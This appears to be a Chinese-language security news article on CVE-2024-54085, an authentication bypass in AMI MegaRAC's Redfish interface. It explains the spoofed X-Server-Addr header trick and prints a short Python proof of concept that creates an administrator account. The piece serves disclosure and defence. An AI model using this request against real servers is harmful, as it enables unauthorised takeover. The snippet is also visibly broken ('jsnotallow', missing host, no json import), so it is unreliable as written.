安全研究人員近期發現，AMI的MegaRAC軟件中存在一個嚴重的漏洞，該漏洞可能被攻擊者利用以遠程繞過認證。這一漏洞編號為CVE-2024-54085，已影響眾多數據中心設備和服務器型號，可能危及全球多家組織的云基礎設施安全。

該漏洞存在于AMI的基板管理控制器（BMC）軟件的Redfish接口中，波及的設備包括HPE Cray XD670和Asus RS720A-E11-RS24U服務器等。根據安全分析，通過Shodan搜索，研究人員已在公共互聯網上發現了大約1000個暴露在外的實例。

Shodan上暴露的實例（來源：Eclypsium）

漏洞影響范圍

Eclypsium的研究人員指出，截至2024年8月的MegaRAC版本均受到該認證繞過漏洞的影響。調查顯示，漏洞存在于固件文件系統中的host-interface-support-module.lua文件中，攻擊者可通過操縱HTTP標頭值來繞過安全控制。

該漏洞的嚴重性不容小覷，當Redfish接口直接暴露在互聯網上時，其CVSS評分高達10.0（CVSSv3）和10.0（CVSSv4）。即使在Redfish訪問僅限于相鄰網絡的環境中，CVSS評分仍高達9.6（CVSSv3）和9.4（CVSSv4）。

成功利用該漏洞的攻擊者可以完全遠程控制受影響的服務器，部署惡意軟件或勒索軟件，篡改固件，甚至通過過壓條件物理損壞硬件，或制造無限重啟循環，導致受害者無法恢復，除非重新配置設備。

漏洞利用細節

這一漏洞的根源在于Redfish接口中的輸入驗證不充分。漏洞代碼雖然檢查了HTTP標頭值，但可以被精心設計的請求欺騙。當用戶添加X-Server-Addr標頭時，lighttpd Web服務器會將其結構化為用戶輸入，后跟服務器的實際地址，例如：

`X-Server-Addr: , ::ffff:1.2.3.4`

漏洞代碼使用正則表達式提取第一個冒號之前的所有內容，這意味著如果攻擊者發送“169.254.0.17:”作為輸入，系統將提取“169.254.0.17”，從而匹配數據庫值并繞過認證。

以下是一個簡單的漏洞利用示例：

`import requests print( json.dumps(requests.post( 'https://:8443/redfish/v1/AccountService/Accounts', jsnotallow={ 'Name': 'Hax0r', 'Password': 'password', 'UserName': 'demo712', 'RoleId': 'Administrator', }, verify=False, headers={'X-Server-Addr': '169.254.0.17:' } ).json(), indent=2) )`

修復建議

AMI已向OEM制造商發布了補丁，制造商需將這些修復措施整合到客戶更新中。建議各組織機構確保遠程管理接口不對外暴露，并定期對所有服務器進行固件更新。